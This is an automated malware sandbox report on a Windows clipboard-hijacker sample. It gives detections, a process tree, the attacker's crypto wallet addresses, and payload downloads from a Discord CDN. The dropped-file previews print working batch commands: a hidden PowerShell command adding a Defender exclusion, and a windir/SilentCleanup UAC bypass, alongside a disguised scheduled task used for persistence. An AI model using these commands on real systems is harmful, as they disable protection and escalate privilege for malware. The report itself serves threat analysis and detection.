Windows Analysis Report hTu8FeYy28.exe

Overview

General Information

Sample Name: hTu8FeYy28.exe
Analysis ID: 499635
MD5: a003b564bd23880f99a29006e780a89b
SHA1: 8465374554a0c6c02f7914c1278afd79e96ed8c4
SHA256: 5bc09c3c2a751169a32cf97a62765f127bce2d0eadce3481a6a831b6fdcc044e
Tags: exe, ModiLoader

Detection

Clipboard Hijacker
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Yara detected Clipboard Hijacker
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses schtasks.exe or at.exe to add and modify task schedules
Injects a PE file into a foreign processes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Uses reg.exe to modify the Windows registry
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Dropped file seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • hTu8FeYy28.exe (PID: 3092 cmdline: 'C:\Users\user\Desktop\hTu8FeYy28.exe' MD5: A003B564BD23880F99A29006E780A89B)
    • hTu8FeYy28.exe (PID: 2336 cmdline: C:\Users\user\Desktop\hTu8FeYy28.exe MD5: A003B564BD23880F99A29006E780A89B)
      • schtasks.exe (PID: 4600 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2824 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1716 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • fodhelper.exe (PID: 3548 cmdline: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe MD5: A003B564BD23880F99A29006E780A89B)

Malware Configuration

Threatname: Clipboard Hijacker

{"Crypto Addresses": ["Ae2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPE", "addr1q9clx0ud02ehvzuqqtqu4tchl6g9kkzllcl2zjpan9kp39m37vlc674nwc9cqqkpe2h30l5stdv9ll3759yrmxtvrztspanadd", "bc1q7hrr7lvjrgdcskmnydwry3629c73qfx9gpk2mc", "cosmos1l8p5237wclrtqf8upw8quwuj32f30zv8gej0jc", "ltc1q0jyf5za7n5pxuz8tgvhzjkaaf5cz5kykp5cd55", "D7Dhy317Lph7ZAx4GALQtYdzcFrx35GSNK", "AYFTxSxSzjDWb2D3fs4TjjsswB41M6Tw6T", "7UT25554RQSTW2S44UVFYWZIZDWQIKUT3O7LG4QBOYDJ7IIEBVFYZZW4YI", "MFxCfYKXwLG1eM93xuNoNCzLoy7an3Ekud", "00000L0000T00MON00000000000000000000000LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ00000000000000W0000000", "D2eMjtv3Fh2EnsZ8SH4FCyvwxNawtpHDxXzBgS4sME4M", "0x4b222739496bcf2AA1F609585dACd8858943B39c", "84VKKNB6tQLam7LPn9PTdKYUfZepoYTfmMMYFEa7btqs7XMqyPWpMdq9FGSvZKsVNgDddtC5JTr1p3ACp9Cbod2f8KABjkw", "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG", "t3SCmhgjNi8B5amJUw61Tc86B9CsTTJvPy7", "TM5d5ZK4uEDe3Ry8gy35nTQLcswbHDzS95", "18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "Z18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "3JxVQHXyiwwws3Yykkw2sUbRNkgimDi725", "bnb1xw6czzmz0arvpf88ufwj4k0yfwfd8vps9f43xu", "LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
17.2.hTu8FeYy28.exe.400000.0.raw.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
17.2.hTu8FeYy28.exe.400000.0.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
17.1.hTu8FeYy28.exe.400000.0.raw.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
17.1.hTu8FeYy28.exe.400000.0.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              AV Detection:

              Found malware configuration
              Source: 17.1.hTu8FeYy28.exe.400000.0.unpack | Malware Configuration Extractor: Clipboard Hijacker
              Multi AV Scanner detection for submitted file
              Source: hTu8FeYy28.exe | Virustotal: Detection: 12%
              Source: 17.1.hTu8FeYy28.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen
              Source: 17.2.hTu8FeYy28.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen

              Compliance:

              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack
              Source: hTu8FeYy28.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49821 version: TLS 1.2
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
              Source: global traffic | HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1 User-Agent: lVali Host: cdn.discordapp.com
              Source: global traffic | HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401FEF OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,17_2_00401FEF
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401F8B GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,17_2_00401F8B
              Source: hTu8FeYy28.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: hTu8FeYy28.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: fodhelper.exe.17.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: fodhelper.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe 5BC09C3C2A751169A32CF97A62765F127BCE2D0EADCE3481A6A831B6FDCC044E
              Source: hTu8FeYy28.exe | Virustotal: Detection: 12%
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File read: C:\Users\user\Desktop\hTu8FeYy28.exe
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: unknown | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe 'C:\Users\user\Desktop\hTu8FeYy28.exe'
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe'
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
              Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Mutant created: \Sessions\1\BaseNamedObjects\CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4776:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_01
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Lnouxqkbbgkvxwmwtigvjxpvnenadlc[1]
              Source: classification engine | Classification label: mal92.spyw.evad.winEXE@21/8@1/1
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: hTu8FeYy28.exe | Static file information: File size 1195008 > 1048576

              Data Obfuscation:

              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack
              Source: C:\Users\user\Desktop\hTu8FeYy28.exeCode function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00401000
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe (dropped file)

              Boot Survival:

              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe'
              Source: C:\Users\user\Desktop\hTu8FeYy28.exeCode function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00401000
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Contains functionality to compare user and computer (likely to detect sandboxes)
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess,17_2_00401272
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\hTu8FeYy28.exeCode function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00401000

              HIPS / PFW / Operating System Protection Evasion:

              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Memory written: C:\Users\user\Desktop\hTu8FeYy28.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Program Manager
              Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progman
              Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation

              Stealing of Sensitive Information:

              Yara detected Clipboard Hijacker
              Source: Yara match | File source: 17.2.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 17.2.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 17.1.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 17.1.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 112 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Clipboard Data 2 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scripting 1 | Application Shimming 1 | Scheduled Task/Job 1 | Modify Registry 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Native API 1 | Logon Script (Windows) | Application Shimming 1 | Process Injection 112 | Security Account Manager | Remote System Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 1 | NTDS | System Information Discovery 11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

              Behavior Graph

              [Behavior graph; ID: 499635, Sample: hTu8FeYy28.exe, Startdate: 08/10/2021, Architecture: WINDOWS, Score: 92]

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              hTu8FeYy28.exe | 12% | Virustotal |

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              26.2.fodhelper.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
              17.1.hTu8FeYy28.exe.400000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
              17.2.hTu8FeYy28.exe.400000.0.unpack | 100% | Avira | TR/ATRAPS.Gen

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              cdn.discordapp.com | 162.159.130.233 | true | false | | high

                Contacted IPs

                Public

                IP | Domain | Country | ASN | ASN Name | Malicious
                162.159.130.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

                General Information

                Joe Sandbox Version: 33.0.0 White Diamond
                Analysis ID: 499635
                Start date: 08.10.2021
                Start time: 17:49:04
                Joe Sandbox Product: CloudBasic
                Overall analysis duration: 0h 9m 4s
                Hypervisor based Inspection enabled: false
                Report type: full
                Sample file name: hTu8FeYy28.exe
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed: 32
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Detection: MAL
                Classification: mal92.spyw.evad.winEXE@21/8@1/1
                EGA Information: Failed
                HDC Information:
                • Successful, ratio: 100% (good quality ratio 66.7%)
                • Quality average: 59.5%
                • Quality standard deviation: 44.6%
                HCA Information:
                • Successful, ratio: 91%
                • Number of executed functions: 8
                • Number of non-executed functions: 6
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 20.49.157.6, 52.251.79.25, 40.112.88.60, 20.54.110.249, 2.20.178.10, 2.20.178.56, 93.184.221.240, 20.199.120.182, 20.199.120.85, 2.20.178.33, 2.20.178.24, 20.82.209.183
                • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                Time | Type | Description
                17:51:49 | API Interceptor | 2x Sleep call for process: hTu8FeYy28.exe modified
                17:51:53 | Task Scheduler | Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                Joe Sandbox View / Context

                IPs


                Domains


                ASN


                JA3 Fingerprints


                Dropped Files

                Match | Associated Sample Name / URL | Detection
                C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | 85OZry2mNl.exe | malicious
                C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | mUlwg5WgCk.exe | malicious

                    Created / dropped Files

                    C:\Users\Public\KDECO.bat
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):155
                    Entropy (8bit):4.687076340713226
                    Encrypted:false
                    SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                    MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                    SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                    SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                    SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                    Malicious:false
                    Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                    C:\Users\Public\Trast.bat
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):34
                    Entropy (8bit):4.314972767530033
                    Encrypted:false
                    SSDEEP:3:LjTnaHF5wlM:rnaHSM
                    MD5:4068C9F69FCD8A171C67F81D4A952A54
                    SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                    SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                    SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                    Malicious:false
                    Preview: start /min C:\Users\Public\UKO.bat
                    C:\Users\Public\UKO.bat
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):250
                    Entropy (8bit):4.865356627324657
                    Encrypted:false
                    SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                    MD5:EAF8D967454C3BBDDBF2E05A421411F8
                    SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                    SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                    SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                    Malicious:false
                    Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                    C:\Users\Public\nest
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):9
                    Entropy (8bit):3.169925001442312
                    Encrypted:false
                    SSDEEP:3:QQJyn:Qgyn
                    MD5:A4FB8B71D0FC27C4B4D69F77A7353AB8
                    SHA1:4BD36DA388173699C10F388DBA106FC86AC513B7
                    SHA-256:E918EDFC622A52B0BBFA8754F95DF6F469105C66E8058C4C412D18CEC6EA5E54
                    SHA-512:274C1D9BE15632FC3A80A7B64A9A9CCD9CF744FECC3A05B8E121748E8F3E73190338685A09C9ADBC8F2B0A6A1322885C325494208EC8CA322A0E81ECB56C3C96
                    Malicious:false
                    Preview: Lnouxqk..
                    C:\Users\Public\nest.bat
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):53
                    Entropy (8bit):4.263285494083192
                    Encrypted:false
                    SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
